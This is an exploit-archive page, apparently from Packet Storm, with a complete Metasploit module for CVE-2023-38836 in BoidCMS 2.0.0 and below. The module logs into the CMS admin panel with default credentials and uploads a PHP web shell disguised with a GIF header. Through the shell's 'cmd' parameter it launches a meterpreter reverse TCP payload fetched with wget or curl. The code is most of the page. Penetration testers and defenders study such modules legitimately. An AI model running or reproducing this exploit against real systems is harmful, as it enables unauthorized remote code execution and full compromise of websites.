exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BoidCMS 2.0.0 Command Injection

BoidCMS 2.0.0 Command Injection
Posted Mar 1, 2024
Authored by bwatters-r7, 1337kid | Site metasploit.com

This Metasploit module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS versions 2.0.0 and below. BoidCMS allows the authenticated upload of a php file as media if the file has the GIF header, even if the file is a php file.

tags | exploit, php
advisories | CVE-2023-38836
SHA-256 | 4be34ec34fdd2c459e03d46cbe61a319a411480ce0b82004ab5d83d8fcc669d1
Download | Favorite | View

BoidCMS 2.0.0 Command Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  prepend Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BoidCMS Command Injection',
        'Description' => %q{
          This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0
          and below.  BoidCMS allows the authenticated upload of a php file as media if the file has
          the GIF header, even if the file is a php file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          '1337kid',    # Discovery
          'bwatters-r7' # Metasploit Module
        ],
        'References' => [
          [ 'CVE', '2023-38836' ],
          [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']
        ],
        'Privileged' => false,
        'Arch' => ARCH_CMD,
        'Targets' => [
          [
            'nix Command',
            {
              'Platform' => ['linux', 'unix', 'python'],
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
                'FETCH_COMMAND' => 'WGET',
                'FETCH_WRITABLE_DIR' => '/tmp'
              }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => ['windows', 'python'],
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',
                'FETCH_WRITABLE_DIR' => '%TEMP%',
                'FETCH_COMMAND' => 'CURL'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-07-13',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'The path', '']),
      OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),
      OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),
      OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])

    ])
    @token = nil
    @shell_filename = nil
  end

  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'keep_cookies' => true,
      'method' => 'GET'
    )
    if res && res.code == 200
      title = res.get_html_document.xpath('//title').first.to_s
      return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')
    end
    return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')
  end

  def extract_token(res)
    token = nil
    if res && res.code == 200
      token = res.get_html_document.xpath("//input[@name='token']/@value").first
    end
    token
  end

  def cms_token
    # initial login
    return @token unless @token.nil?

    vprint_status('Getting Token')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'keep_cookies' => true,
      'method' => 'GET'
    )
    @token = extract_token(res)
  end

  def cms_login?(login_token)
    vprint_status('Logging into CMS')
    cms_password = datastore['CMS_PASSWORD']
    cms_username = datastore['CMS_USERNAME']
    vars_form_data =
      [
        {
          'name' => 'username',
          'data' => cms_username
        },
        {
          'name' => 'password',
          'data' => cms_password
        },
        {
          'name' => 'login',
          'data' => 'Login'
        },
        {
          'name' => 'token',
          'data' => login_token.to_s
        }
      ]
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_form_data' => vars_form_data
    )
    res && res.code == 302
  end

  def upload_php?(login_token, shell_filename)
    vprint_status("Uploading PHP file #{shell_filename}")
    vars_form_data =
      [
        {
          'name' => 'file',
          'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',
          'filename' => shell_filename
        },
        {
          'name' => 'token',
          'data' => login_token.to_s
        },
        {
          'name' => 'upload',
          'data' => 'Upload'
        }
      ]

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_get' => {
        'page' => 'media'
      },
      'vars_form_data' => vars_form_data
    )
    res && res.code == 302
  end

  def launch_payload(shell_filename, payload_cmd)
    # send the command to the php page
    vprint_status('launching Payload')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),
      'method' => 'GET',
      'keep_cookies' => true,
      'vars_get' =>
        {
          'cmd' => payload_cmd
        }
    )
  end

  def exploit
    @shell_filename = datastore['PHP_FILENAME']
    login_token = cms_token

    fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?
    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)
    if upload_php?(login_token, @shell_filename)
      register_file_for_cleanup @shell_filename
      launch_payload(@shell_filename, payload.encoded)
    else
      fail_with(Failure::UnexpectedReply, 'Failed to upload php files')
    end
  end

end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close